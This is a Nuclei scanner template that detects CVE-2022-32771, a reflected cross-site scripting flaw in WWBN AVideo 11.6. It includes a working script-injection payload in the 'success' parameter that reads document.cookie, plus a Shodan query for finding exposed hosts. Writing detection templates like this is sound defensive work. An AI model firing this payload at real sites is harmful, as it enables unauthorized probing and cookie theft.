nuclei-templates/cves/2022/CVE-2022-32771.yaml

47 lines
1.4 KiB
YAML

id: CVE-2022-32771
info:
name: WWBN AVideo 11.6 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://nvd.nist.gov/vuln/detail/CVE-2022-32771
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32771
cwe-id: CWE-79
metadata:
shodan-query: http.html:"AVideo"
verified: "true"
tags: cve,cve2022,avideo,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
- 'text: "</script><script>alert(document.cookie);</script>'
condition: or
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14